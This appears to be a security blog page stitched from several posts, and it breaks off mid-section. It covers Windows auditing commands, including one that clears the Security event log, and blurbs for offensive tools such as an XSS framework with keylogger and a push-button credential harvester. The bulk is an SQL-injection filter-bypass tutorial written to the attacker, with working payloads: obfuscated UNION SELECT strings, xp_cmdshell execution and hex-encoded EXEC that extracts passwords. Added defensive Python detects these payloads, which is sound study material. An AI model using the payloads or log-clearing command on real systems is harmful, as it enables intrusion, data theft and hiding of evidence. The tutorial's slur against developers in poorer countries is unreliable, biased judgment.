Displays the executable involved in creating each connection or listening port. In some cases well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions.

Important 

Note: this is very good for spotting malware that does not tamper with the system's own functions. Against a rootkit that hooks the APIs netstat relies on it will not be much help, because the connections are hidden from netstat too :).
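The patch list (wmic qfe, here and in Step 4 of the Windows Auditing post above) and the connection list (netstat -nab, here and in Step 7 there) are usually dumped to text files and read by eye. As an added example (not part of the original post), the Python below turns two such dumps into the two answers an auditor actually wants: how stale the patch level is, and which executable is listening on which port. Both inputs are constructed samples in the shape the tools print (wmic with /format:csv, netstat -nab); the hostname, KB numbers, dates, addresses and executables are made up, and the date format M/D/YYYY is an assumption, since wmic prints dates in the system locale.

```python
from datetime import date, datetime
import csv
import io
import re

# Constructed sample of: wmic qfe get HotFixID,Description,InstalledOn /format:csv
# (wmic prints a blank first line and orders the columns alphabetically;
# the KB numbers and dates are made up)
SAMPLE_QFE = """
Node,Description,HotFixID,InstalledOn
WKS01,Security Update,KB0000001,1/9/2013
WKS01,Update,KB0000002,2/13/2013
WKS01,Security Update,KB0000003,3/13/2013
"""

# Constructed sample of netstat -nab output (the -b column needs an
# elevated prompt); addresses and executables are made up.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
 Can not obtain ownership information
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
 [nc.exe]
  TCP    192.168.1.5:49160      203.0.113.10:443       ESTABLISHED
 [iexplore.exe]
  UDP    0.0.0.0:5355           *:*
 [svchost.exe]
"""


def parse_qfe_csv(text: str) -> list:
    """Rows as dicts with InstalledOn parsed to a date (None if the field
    is empty or not in M/D/YYYY form)."""
    rows = []
    for row in csv.DictReader(io.StringIO(text.strip())):
        try:
            row["InstalledOn"] = datetime.strptime(row["InstalledOn"], "%m/%d/%Y").date()
        except ValueError:
            row["InstalledOn"] = None
        rows.append(row)
    return rows


def patch_staleness_days(rows: list, today) -> int:
    """Days since the most recently installed hotfix, or -1 if none is
    dated. today may be a date or an ISO string such as "2013-05-11"."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    dates = [r["InstalledOn"] for r in rows if r.get("InstalledOn")]
    return (today - max(dates)).days if dates else -1


_CONN = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s*(\S+)?\s*$")


def parse_netstat_nab(text: str) -> list:
    """Group each connection line with the owner lines netstat -b prints
    after it: component names first, the executable in brackets last."""
    conns = []
    for line in text.splitlines():
        m = _CONN.match(line)
        if m:
            conns.append({"proto": m.group(1), "local": m.group(2),
                          "remote": m.group(3), "state": m.group(4) or "",
                          "exe": None, "components": []})
        elif conns and line.strip():
            s = line.strip()
            if s.startswith("[") and s.endswith("]"):
                conns[-1]["exe"] = s[1:-1]
            else:
                conns[-1]["components"].append(s)
    return conns


def listeners(conns: list) -> list:
    """(proto, port, exe) for every listening TCP socket and every bound
    UDP socket; this is the list to compare against the host's role."""
    out = []
    for c in conns:
        if c["proto"] == "TCP" and c["state"] != "LISTENING":
            continue
        port = int(c["local"].rsplit(":", 1)[1])
        out.append((c["proto"], port, c["exe"] or "unknown"))
    return sorted(out)


if __name__ == "__main__":
    rows = parse_qfe_csv(SAMPLE_QFE)
    print("days since last patch:", patch_staleness_days(rows, date.today()))
    for proto, port, exe in listeners(parse_netstat_nab(SAMPLE_NETSTAT)):
        print(f"{proto:3} {port:5} {exe}")
```

On the sample, the listener on 4444 owned by nc.exe is the kind of entry that should stand out on a workstation, and the "unknown" owner on 445 is what you get when netstat cannot obtain ownership information; both are worth a second look rather than a shrug.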


Handling Windows Users

The following examples display a list of all user accounts on the local computer (some of them add other useful information): 

1. net user
2. wmic useraccount
3. wmic useraccount list brief
The following example displays information about the user account someuser:

1. net user someuser

The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B) and the user's full name. Note that ^ is the escape character of cmd.exe, so a password containing it must be typed as ^^ (or the whole password put in quotes); typed as written, the account gets the password Cyk4g3B:

1. net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison"
or

1. Simple add user: net user someuser /add

2. net user miked /times:M-F,08:00-17:00

Note: sets the logon hours (8 A.M. to 5 P.M.) for miked using 24-hour notation:

1. net user miked /times:M-F,8AM-5PM

Note: sets the logon hours (8 A.M. to 5 P.M.) for miked using 12-hour notation:

1. net user anibals /times:M,4AM-5PM;T,1PM-3PM;W-F,8:00-17:00

Note: specifies logon hours of 4 A.M. until 5 P.M. on Monday, 1 P.M. until 3 P.M. on Tuesday, and 8 A.M. until 5 P.M. Wednesday through Friday for anibals:

1. wmic /node:remotecomputer computersystem get username 

Note: determine the user currently logged in on a remote computer.

List Event Logs  

1. wmic ntevent list brief --- brief takes a while, full takes even longer
2. wmic nteventlog where (description like "%secevent%") call clearevent --- clears the Security event log; this is destructive and an anti-forensic action, so never run it during an audit

List Services  

1. wmic service list brief

Delete ARP cache

1. netsh int ip delete arpcache

Auditing the security policies

auditpol (Windows Vista/7 and Windows Server 2008/2008 R2) displays information about audit policies and manipulates them; the TechNet page for each subcommand has examples. For instance, to show the policy that applies to one user (by SID) in three categories:
Auditpol /get /user:{S-1-5-21-1443922412-3030960370-963420232-51} /category:"System","Detailed Tracking","Object Access"

Reboot or Shutdown a box

1. wmic os where buildnumber="2600" call reboot -- get the build number from the OS info (wmic os get buildnumber); 2600 is Windows XP
2. shutdown -r -f -t 2
3. shutdown -s -f -t 4

Reference:

http://technet.microsoft.com
http://isc.sans.edu
http://commandwindows.com
http://theinterw3bs.com

    OWASP Xenotix XSS Exploit Framework


    Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. It injects payloads into the parameters of a web page that are vulnerable to XSS; it is basically a payload-list based XSS scanner. It gives a penetration tester the ability to test every XSS payload in the payload list against a web application with ease. The tool supports both a manual mode and an automated, time-sharing based test mode. It includes an XSS encoder, a victim-side keystroke logger, and an executable drive-by downloader.


    Features:

    * Built in XSS Payloads

    * XSS Key logger

    * XSS Executable Drive-by downloader

    * Automatic XSS Testing

    * XSS Encoder


    Download: https://www.owasp.org

    jSQL Injection - Java GUI for database injection.



    An easy-to-use SQL injection tool for retrieving database information from a remote server.

    Running an injection requires the URL of the remote server and the name of the parameter to inject.

    jSQL Injection features:

    * GET, POST, header, cookie methods
    * visual, error based, blind algorithms
    * automatic best algorithms detection
    * data retrieving progression
    * proxy settings

    For now supports only MySQL.


    Download: http://code.google.com/

    Smartphone Pentest Framework v.0.1




    The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed in an environment. The tool allows for assessment of remote vulnerabilities, client side attacks, social engineering attacks, post exploitation and local privilege escalation. This is an initial release, with a subset of features from each section. SPF is the product of a DARPA Cyber Fast Track grant.

    SPF is made up of several parts that may be mixed and matched to meet users' needs. SPF v0.1 includes the following:


    • SPF Console

    • SPF Web based GUI

    • SPF Android App

    • SPF Android Agent


    Download: https://github.com

    Demo: http://vimeo.com

    Friday, May 10, 2013

    Snuck - Automatic XSS filter bypass tool




    snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach it adopts is based on inspecting the reflection context of the injection and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser: a real web browser is driven to reproduce the attacker's behavior and possibly the victim's.


    snuck is quite different from typical web security scanners: it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the DOM of the reflecting web page. Access to the page's DOM is possible through Selenium WebDriver, an automation framework that allows operations in web browsers to be replicated. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in to make snuck aware of the steps it needs to perform against the tested web application. Practically speaking, the approach is similar to iSTAR's, but it focuses on one particular XSS filter.


    Download: http://code.google.com/

    Subterfuge Beta Version 4.2 Released

    Automated Man-in-the-Middle Attack Framework





    Abstract: 


    Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation… A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results.


    On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. Given the increase in automated hacking tools, it is surprising that a simplistic, “push-button” tool has not been created for information security professionals to validate their networks’ ability to protect against a Man-In-The-Middle attack. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.


    Download: http://code.google.com/p/subterfuge

    Subterfuge DEFCON 20 Teaser: http://www.youtube.com

    Cookie Cadger v.0.9



    An auditing tool for Wi-Fi or wired Ethernet connections

    Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests.

    Cookie Cadger works on Windows, Linux or Mac and requires Java 7. Using Cookie Cadger requires “tshark”, a utility that is part of the Wireshark suite, to be installed; usually simply installing Wireshark is sufficient. Additionally, capturing packets promiscuously requires compatible hardware: capturing Wi-Fi traffic requires hardware capable of monitor mode, and the knowledge of how to place your device into monitor mode.

    Download:
    https://www.cookiecadger.com

    Thursday, May 9, 2013

    The Teenage Mutant Ninja Turtles project



    The Teenage Mutant Ninja Turtles project is four things:
    1-A Web Application payload database.
    2-A Web Application error database.
    3-A Web Application payload mutator.
    4-A Web Application payload manager (e.g. does database clean up).

    Nowadays all high profile sites in the financial and telecommunication sectors use filters to filter out all types of vulnerabilities such as SQL injection, XSS, XXE, HTTP header injection etc. In this particular project I am going to provide you with a tool to generate obfuscated fuzzing injection attacks in order to bypass badly implemented web application injection filters (e.g. SQL injection, XSS injection etc.).


    Download: http://code.google.com

    More Info: http://code.google.com

    Obfuscate SQL Fuzzing for fun and profit

    Introduction

    Nowadays cyber criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems. SQL injection is the prevalent way of attacking front-end web applications and back-end databases to compromise data confidentiality. Recently published reports by the Web Hacking Incidents Database (WHID) show SQL injection as the top attack vector, making up 19 percent of all security breaches examined by WHID. The Open Web Application Security Project (OWASP) top 10 risk categorization chart rates SQL injection as the number one threat, along with operating system command injection and LDAP injection attacks.

    But why does this happen? Have you ever thought about it? Well, the answer is easy: we are seeing such an increase in SQL injection incidents because of the "industrialization of hacking". SQL injection attacks are generally carried out by typing malformed SQL commands into front-end web application input boxes that are tied to database accounts, in order to trick the database into offering more access to information than the developer intended. Part of the reason for such a huge rise in SQL injection attacks is that in recent years criminals have increasingly used automated and manual SQL injection attacks, powered by botnets or professional hackers, to hit vulnerable systems. They use the attacks both to steal information from databases and to inject malicious code into these databases as a means to perpetrate further attacks.

    Why SQL injection attacks still exist

    SQL injection attacks happen because of badly implemented web application filters, meaning that the web application will often fail to properly sanitize malicious user input. You can usually find this type of badly implemented SQL injection filter in web applications outsourced to India, Asia or other possibly third world countries, where developers are not aware of what proper SQL injection filtering is. Most of the time well known large organizations from the financial sector will create a large team of functional and security testers and then outsource the project in order to reduce the development cost, while at the same time trying to maintain and increase control of the web application development progress and the quality assurance process. Unfortunately this is rarely achieved, or even possible, due to bad management procedures or a lack of security awareness on the side of the developers. The main mistake developers make is that they look for a quick fix; for example, they might think that placing a Web Application Firewall (WAF) in front of a web application and applying black list filtering will solve the problem.

    That is wrong, because SQL injection attacks can be obfuscated to bypass these quick fixes relatively easily. Obfuscating SQL injection attacks is nowadays a de facto standard for penetration testing and has been used by well known web malware such as ASPRox. The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and in performing SQL injections into websites in order to spread malware. Since its discovery in 2008 the Asprox botnet has been involved in multiple high-profile attacks on various websites in order to spread malware. The botnet itself consisted of roughly 15,000 infected computers as of May 2008, although its size is highly variable, as the controllers of the botnet have been known to deliberately shrink (and later regrow) it in order to prevent more aggressive countermeasures from the IT community. ASPRox used automated obfuscated SQL injection attacks extensively. In order to better understand what SQL obfuscation means within the context of computer security, you should consider obfuscated SQL injection attacks as a technique similar to virus polymorphism.

    Why obfuscate SQL injection

    This article is going to talk about obfuscated SQL injection fuzzing. Nowadays all high profile sites in the financial and telecommunication sectors use filters to filter out all types of vulnerabilities such as SQL injection, XSS, XXE, HTTP header injection etc. In this particular article we are going to talk only about obfuscated SQL injection fuzzing attacks.

    First of all what obfuscate means based on the Dictionary.com:

    "Definition of obfuscate: verb (used with object), ob·fus·cat·ed, ob·fus·cat·ing.

    1-To confuse, bewilder, or stupefy.
    2-To make obscure or unclear: to obfuscate a problem with extraneous information.
    3-To darken."

    Web applications frequently employ input filters that are designed to defend against common attacks, including SQL injection. These filters may exist within the application's own code, in the form of custom input validation, or may be implemented outside the application, in the form of web application firewalls (WAFs) or intrusion prevention systems (IPSs). Usually these types of filters are called virtual patches. After you read this article you should be able to understand that virtual patching is not going to protect you from advanced attackers.



    Common types of SQL filters

    In the context of SQL injection attacks, the most interesting filters you are likely to encounter are those which attempt to block any input containing one or more of the following:

    1-SQL keywords, such as SELECT, AND, INSERT
    2-Specific individual characters, such as quotation marks or hyphens
    3-White-spaces 

    You may also encounter filters which, rather than blocking input containing the items in the preceding list, attempt to modify the input to make it safe, either by encoding or escaping problematic characters or by stripping the offending items from the input and processing what is left in the normal way. The latter is not logical: if someone is trying to harm your web application, why would you want to process their malicious input at all?

    Often, the application code that these filters protect is vulnerable to SQL injection (because incompetent, ignorant or badly paid developers exist all over the world), and to exploit the vulnerability you need to find a means of evading the filter to pass your malicious input to the vulnerable code. In the next few sections, we will examine some techniques that you can use to do just that.

    Bypassing SQL Injection filters

    There are numerous ways to bypass SQL injection filters, and even more ways to exploit them. The most common ways of evading SQL injection filters are:

    1-Using Case Variation
    2-Using SQL Comments
    3-Using URL Encoding
    4-Using Dynamic Query Execution
    5-Using Null Bytes
    6-Nesting Stripped Expressions
    7-Exploiting Truncation
    8-Using Non-Standard Entry Points
    9-Combine all techniques above 

    Take notice that all the above SQL injection filter bypassing techniques are based on the black list filtering mentality, not the white list filtering logic. This means that bad software development is based on the black list filter concept.

    Using Case Variation

    If a keyword-blocking filter is particularly naive, you may be able to circumvent it by varying the case of the characters in your attack string, because the database handles SQL keywords in a case-insensitive manner. For example, if the following input is being blocked:

    ' UNION SELECT @@version --

    You may be able to bypass the filter using the following alternative:

    ' UnIoN sElEcT @@version --

    Note: Using only uppercase or only lower case might also work, but I would not suggest spending a lot of time in that type of fuzzing.

    Using SQL Comments

    You can use in-line comment sequences to create snippets of SQL which are syntactically unusual but perfectly valid, and which bypass various kinds of input filters. You can circumvent various simple pattern-matching filters in this way.

    Of course, you can use this same technique to bypass filters which simply block any white-space whatsoever. Many developers wrongly believe that by restricting input to a single token they are preventing SQL injection attacks, forgetting that in-line comments enable an attacker to construct arbitrarily complex SQL without using any spaces.

    In the case of MySQL, you can even use in-line comments within SQL keywords, enabling many common keyword-blocking filters to be circumvented. For example, the following attacks will still work if the back-end database is MySQL and the filter only checks SQL injection strings for spaces:

    ' UNION/**/SELECT/**/@@version/**/--

    or

    ' U/**/NI/**/ON/**/SELECT/**/@@version/**/--


    Note: This type of filter bypassing method covers both gap filling (white-space removal) and black list filtering of bad character sequences.

    Using URL Encoding

    URL encoding is a versatile technique that you can use to defeat many kinds of input filters. In its most basic form, this involves replacing problematic characters with their ASCII code in hexadecimal form, preceded by the % character. For example, the ASCII code for a single quotation mark is 0x27, so its URL-encoded representation is %27. In this situation, you can use an attack such as the following to bypass a filter:

    Original query:

    ' UNION SELECT @@version --

    URL-encoded query:

    %27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%40%40%76%65%72%73%69%6f%6e%20%2d%2d

    In other cases, this basic URL-encoding attack does not work, but you can nevertheless circumvent the filter by double-URL-encoding the blocked characters. In the double-encoded attack, the % character in the original attack is itself URL-encoded in the normal way (as %25), so that the double-URL-encoded form of a single quotation mark is %2527. If you modify the preceding attack to use double-URL encoding, it looks like this:

    %25%32%37%25%32%30%25%35%35%25%34%65%25%34%39%25%34%66%25%34%65%25%32%30%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%32%30%25%32%64%25%32%64

    Note: You should also take into consideration that selective URL-encoding (encoding only some of the characters) is also a valid way to bypass SQL injection filtering.

    Double-URL encoding sometimes works because Web applications sometimes decode user input more than once, and apply their input filters before the final decoding step. In the preceding example, the steps involved are as follows:

    1-The attacker supplies the input '%252f%252a*/UNION ...
    2-The application URL-decodes the input as '%2f%2a*/ UNION ...
    3-The application validates that the input does not contain /* (which it doesn't).
    4-The application URL-decodes the input as '/**/ UNION ...
    5-The application processes the input within an SQL query, and the attack is successful. 

    A further variation on the URL-encoding technique is to use Unicode encodings of blocked characters. As well as using the % character with a two-digit hexadecimal ASCII code, URL encoding can employ various Unicode representations of characters. There is a very good web site you can use to test various types of encoding here. The SQL injection query, when Unicode encoded, looks like this:

    27 20 55 4E 49 4F 4E 20 53 45 4C 45 43 54 20 40 40 76 65 72 73 69 6F 6E 20 2D 2D


    Note: I have not experimented a lot with Unicode encoding and frankly I do not think it is going to be very useful for fuzzing SQL.

    Further, because of the complexity of the Unicode specification, decoders often tolerate illegal encoding and decode them on a “closest fit” basis. If an application's input validation checks for certain literal and Unicode-encoded strings, it may be possible to submit illegal encoding of blocked characters, which will be accepted by the input filter but which will decode appropriately to deliver a successful attack.
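The three bypasses described so far (case variation, in-line comments, single and double URL encoding) all defeat a filter that matches the raw request value. The following Python is an added example, not code from the original article: it canonicalizes the input the way a filter should before matching (decode until the value stops changing, drop NUL bytes, resolve comments, collapse white-space, case-fold) and compares a naive raw-string match against a match on the canonical forms. The keyword pair that is checked, the decode round limit and the substring-style match are assumptions made for the demonstration; the bypass strings are the article's own.

```python
import re
from urllib.parse import unquote

# Inline /* ... */ comments, including the empty /**/ the article uses as a gap filler.
COMMENT = re.compile(r"/\*.*?\*/", re.S)
WHITESPACE = re.compile(r"\s+")


def naive_blocked(raw: str) -> bool:
    """The weak filter the article describes: a case-sensitive match on the raw request value."""
    return "UNION SELECT" in raw


def url_decode_fully(raw: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing, so %2527 -> %27 -> ' is seen as a quote.
    Validating before the last decode step is the bug behind the double-encoding bypass.
    The round limit (an assumption) keeps crafted input from forcing unbounded work."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_forms(raw: str) -> tuple:
    """Canonical spellings of the input: decoded, NUL bytes dropped, comments resolved,
    white-space collapsed, case folded. SQL dialects disagree on whether /**/ separates
    tokens (UNION/**/SELECT) or is transparent inside one (U/**/NI/**/ON), so both
    readings are produced and a match on either one counts."""
    decoded = url_decode_fully(raw).replace("\x00", "")
    comment_as_space = COMMENT.sub(" ", decoded)
    comment_removed = COMMENT.sub("", decoded)
    return tuple(WHITESPACE.sub(" ", form).strip().lower()
                 for form in (comment_as_space, comment_removed))


def normalized_blocked(raw: str) -> bool:
    """Same keyword pair as the naive filter, matched against the canonical forms.
    A substring match is used because that is what the article's blacklist filters do;
    the white list and parameterized queries later in the article are the real fix,
    this only shows what canonicalization buys a blacklist."""
    return any("union" in form and "select" in form for form in canonical_forms(raw))


# The article's own bypass strings, every one of which slips past naive_blocked().
BYPASSES = (
    "' UnIoN sElEcT @@version --",
    "' UNION/**/SELECT/**/@@version/**/--",
    "' U/**/NI/**/ON/**/SELECT/**/@@version/**/--",
    "%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%40%40%76%65%72%73%69%6f%6e%20%2d%2d",
    "%25%32%37%25%32%30%25%35%35%25%34%65%25%34%39%25%34%66%25%34%65%25%32%30%25%35%33"
    "%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%34%30%25%34%30%25%37%36"
    "%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%32%30%25%32%64%25%32%64",
)


if __name__ == "__main__":
    for sample in BYPASSES:
        print(f"naive={naive_blocked(sample)!s:5} normalized={normalized_blocked(sample)!s:5} {sample[:40]}")
```

The point the comparison makes is about ordering: decoding, comment handling and case folding have to happen before the match, and on the same value the database will eventually see, or the filter is inspecting a different string than the one that gets executed.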

    Using the CAST and CONVERT keywords


    Another subcategory of encoding attacks is the CAST and CONVERT attack. The CAST and CONVERT keywords explicitly convert an expression of one data type to another; moreover, the CAST keyword is built into MySQL, MSSQL and PostgreSQL. It has been used by various types of malware attacks on numerous web sites and is a very interesting SQL injection filter bypass. The most infamous botnet that used this type of attack was the ASPRox botnet. Have a look at the syntax:

    Using CAST:

    CAST ( expression AS data_type )

    Using CONVERT:

    CONVERT ( data_type [ ( length ) ] , expression [ , style ] )

    With CAST and CONVERT you get filter-bypassing results similar to those of the SUBSTRING function; an example will show what I mean. The following SQL queries all return the same result:

    SELECT SUBSTRING('CAST and CONVERT', 1, 4)

    Returned result: CAST

    SELECT CAST('CAST and CONVERT' AS char(4))

    Returned result: CAST

    SELECT CONVERT(varchar,'CAST',1)

    Returned result: CAST

    Note: See that both SUBSTRING and CAST behave the same and can also be used for blind SQL injection attacks (you can test these queries with sqlzoo.net).

    Expanding further on CONVERT and CAST, we can identify that the following SQL queries are also valid and very interesting; see how we can extract the MSSQL database version with CAST and CONVERT:

    1st Step: Identify the query to execute:

    SELECT @@VERSION

    2nd Step: Construct the query based on keywords CAST and CONVERT:

    SELECT CAST('SELECT @@VERSION' AS VARCHAR(16))
    OR
    SELECT CONVERT(VARCHAR,'SELECT @@VERSION',1)

    3rd Step: Execute the query using the keyword EXEC:

    DECLARE @sqlcommand VARCHAR(100)
    SET @sqlcommand = (SELECT CONVERT(VARCHAR,'SELECT @@VERSION',1))
    EXEC(@sqlcommand)


    OR convert first the SELECT @@VERSION to Hex


    DECLARE @sqlcommand VARCHAR(100)
    SET @sqlcommand = (SELECT CAST(0x53454C45435420404076657273696F6E00 AS VARCHAR(34)))
    EXEC(@sqlcommand)


    Note: See how creative you can become with CAST and CONVERT. Since the data contained in the CAST expression is hexadecimal, a conversion to VARCHAR is performed.

    You can also use nested CAST and CONVERT queries to inject your malicious input. That way you can start interchanging between different encoding types and create more complicated queries. The following pattern should be a good example (placeholders in angle brackets):

    CAST(CAST(<payload in hex> AS VARCHAR(<character length of payload>)) AS VARCHAR(<character length of total payload>))


    Note: See how simple it is.

    Using Dynamic Query Execution


    Many databases allow SQL queries to be executed dynamically, by passing a string containing an SQL query into a database function which executes the query. If you have discovered a valid SQL injection point, but find that the application’s input filters are blocking queries you want to inject, you may be able to use dynamic execution to circumvent the filters. Dynamic query execution works differently on different databases.

    On Microsoft SQL Server, you can use the EXEC function to execute a query in string form. For example:

    'EXEC xp_cmdshell 'dir'; --

    or

    'UNION EXEC xp_cmdshell 'dir'; --


    Note: Using the EXEC function you can enumerate all enabled stored procedures in the back end database and also map assigned privileges to stored procedures.

    In Oracle, you can use the EXECUTE IMMEDIATE command to execute a query in string form. For example:

    DECLARE pw VARCHAR2(1000);
    BEGIN
    EXECUTE IMMEDIATE 'SELECT password FROM tblUsers' INTO pw;
    DBMS_OUTPUT.PUT_LINE(pw);
    END;


    Note: You can do that line by line or all together; of course, other filter bypassing methods can be combined with this one.

    The above SQL injection attack type can be submitted to the web application attack entry point, either the way it is presented above or as a batch of commands separated by semicolons when the back end database accepts batch queries (e.g. MSSQL).

    For example in MSSQL you could do something like this:


    DECLARE @MSSQLVERSION VARCHAR(100); SET @MSSQLVERSION = 'SELECT @@VERSION'; EXEC (@MSSQLVERSION); --
    Note: The same query can be submitted from different web application entry points or the same.

    Databases provide various means of manipulating strings, and the key to using dynamic execution to defeat input filters is to use the string manipulation functions to convert input that is allowed by the filters into a string which contains your desired query. In the simplest case, you can use string concatenation to construct a string from smaller parts. Different databases use different syntax for string concatenation.

    For example, if the SQL keyword SELECT is blocked, you can construct it as follows:



    Oracle: 'SEL'||'ECT'
    MS-SQL: 'SEL'+'ECT'
    MySQL: 'SEL' 'ECT'


    Further examples of this SQL obfuscation method would be:


    Oracle: UN'||'ION SEL'||'ECT NU'||'LL FR'||'OM DU'||'AL--
    MS-SQL: ' un'+'ion (se'+'lect @@version) --
    MySQL: ' SE''LECT user(); #

    Note that SQL Server uses a + character for concatenation, whereas MySQL uses a space. If you are submitting these characters in an HTTP request, you will need to URL-encode them as %2b and %20, respectively. Going further, you can construct individual characters using the CHAR function (CHR in Oracle) from their ASCII character codes. For example, to construct the SELECT keyword on SQL Server, you can use:

    CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)


    Note: The Firefox plug-in tool called Hackbar is also doing that automatically (for a long time now).

    You can construct strings in this way without using any quotation mark characters. If you have an SQL injection entry point where quotation marks are blocked, you can use the CHAR function to place strings (such as ‘admin’) into your exploits. Other string manipulation functions may be useful as well. For example, Oracle includes the functions REVERSE, TRANSLATE, REPLACE, and SUBSTR. Another way to construct strings for dynamic execution on the SQL Server platform is to instantiate a string from a single hexadecimal number which represents the string’s ASCII character codes. For example, the string:

    SELECT password FROM tblUsers


    Can be constructed and dynamically executed as follows:


    DECLARE @query VARCHAR(100)
    SELECT @query = 0x53454c4543542070617373776f72642046524f4d2074626c5573657273
    EXEC(@query)


    Note:
    The mass SQL injection attacks against Web applications that started in early 2008 employed this technique to reduce the chance of their exploit code being blocked by input filters in the applications being attacked.
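Hex literals, CHAR()/CHR() chains and split quoted literals hide a keyword from a filter only until someone unfolds them. The Python below is an added example (not the article's code, and not what the Hackbar plug-in does) that rewrites those constructions back into plain string literals before looking for keywords; it covers the CAST(0x...) form from the CAST and CONVERT section as well as the dynamic-execution examples above. The keyword list, the printable-ASCII restriction and the decision to leave odd-length or non-text hex untouched are assumptions for the demonstration; the sample statements are the article's.

```python
import re

# Constructions the article uses to keep keywords out of the raw request text.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")             # 0x53454c... (SQL Server, MySQL)
CHAR_CALL = re.compile(r"\bCHA?R\((\d{1,3})\)", re.IGNORECASE)    # CHAR(83) on SQL Server/MySQL, CHR(83) on Oracle
CONCAT_GLUE = re.compile(r"'\s*(?:\|\||\+)\s*'")                  # 'SEL'||'ECT' (Oracle), 'SEL'+'ECT' (SQL Server)
ADJACENT_LITERALS = re.compile(r"'[ \t]+'")                       # 'SEL' 'ECT' (MySQL)

# Keywords worth a second look once the literals are unfolded (an assumed list).
KEYWORDS = ("union", "select", "exec", "xp_cmdshell")


def _hex_to_literal(match):
    """0x53454c454354 -> 'SELECT'. Odd-length or non-ASCII values are left alone:
    those are genuine binary data, not a smuggled string."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    try:
        text = bytes.fromhex(digits).decode("ascii")
    except UnicodeDecodeError:
        return match.group(0)
    text = text.rstrip("\x00")          # the article's CAST example carries a trailing NUL
    return "'" + text + "'" if text.isprintable() else match.group(0)


def _char_to_literal(match):
    """CHAR(83) -> 'S', for printable ASCII codes only."""
    code = int(match.group(1))
    return "'" + chr(code) + "'" if 32 <= code < 127 else match.group(0)


def unfold(sql: str) -> str:
    """Rewrite hex literals, CHAR()/CHR() chains and split literals into one plain literal."""
    text = HEX_LITERAL.sub(_hex_to_literal, sql)
    text = CHAR_CALL.sub(_char_to_literal, text)
    text = CONCAT_GLUE.sub("", text)          # 'S'+'E' -> 'SE'
    # 'SEL' 'ECT' -> 'SELECT'. This also merges a literal that consists only of blanks
    # between two other literals, which is acceptable for inspection, not for rewriting.
    text = ADJACENT_LITERALS.sub("", text)
    return text


def suspicious_keywords(sql: str) -> list:
    """Keywords present after unfolding; the raw text may have contained none of them."""
    unfolded = unfold(sql).lower()
    return [keyword for keyword in KEYWORDS if keyword in unfolded]


if __name__ == "__main__":
    batch = ("DECLARE @query VARCHAR(100)\n"
             "SELECT @query = 0x53454c4543542070617373776f72642046524f4d2074626c5573657273\n"
             "EXEC(@query)")
    print(unfold(batch))
    print(suspicious_keywords(batch))
```

Run in front of a keyword check, this turns the article's hex-only batch into the readable `SELECT password FROM tblUsers` it really is; the same idea applies to any encoding layer the database will undo before execution.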

    Using Null Bytes


    Often, the input filters which you need to bypass in order to exploit an SQL injection vulnerability are implemented outside the application's own code, in intrusion detection systems (IDSs) or WAFs. For performance reasons, these components are typically written in native code languages, such as C++. In this situation, you can often use null byte attacks to circumvent input filters and smuggle your exploits into the back-end application.

    Null byte attacks work due to the different ways that null bytes are handled in native and managed code. In native code, the length of a string is determined by the position of the first null byte from the start of the string—the null byte effectively terminates the string. In managed code, on the other hand, string objects comprise a character array (which may contain null bytes) and a separate record of the string's length. This difference means that when the native filter processes your input, it may stop processing the input when it encounters a null byte, because this denotes the end of the string as far as the filter is concerned. If the input prior to the null byte is benign, the filter will not block the input.

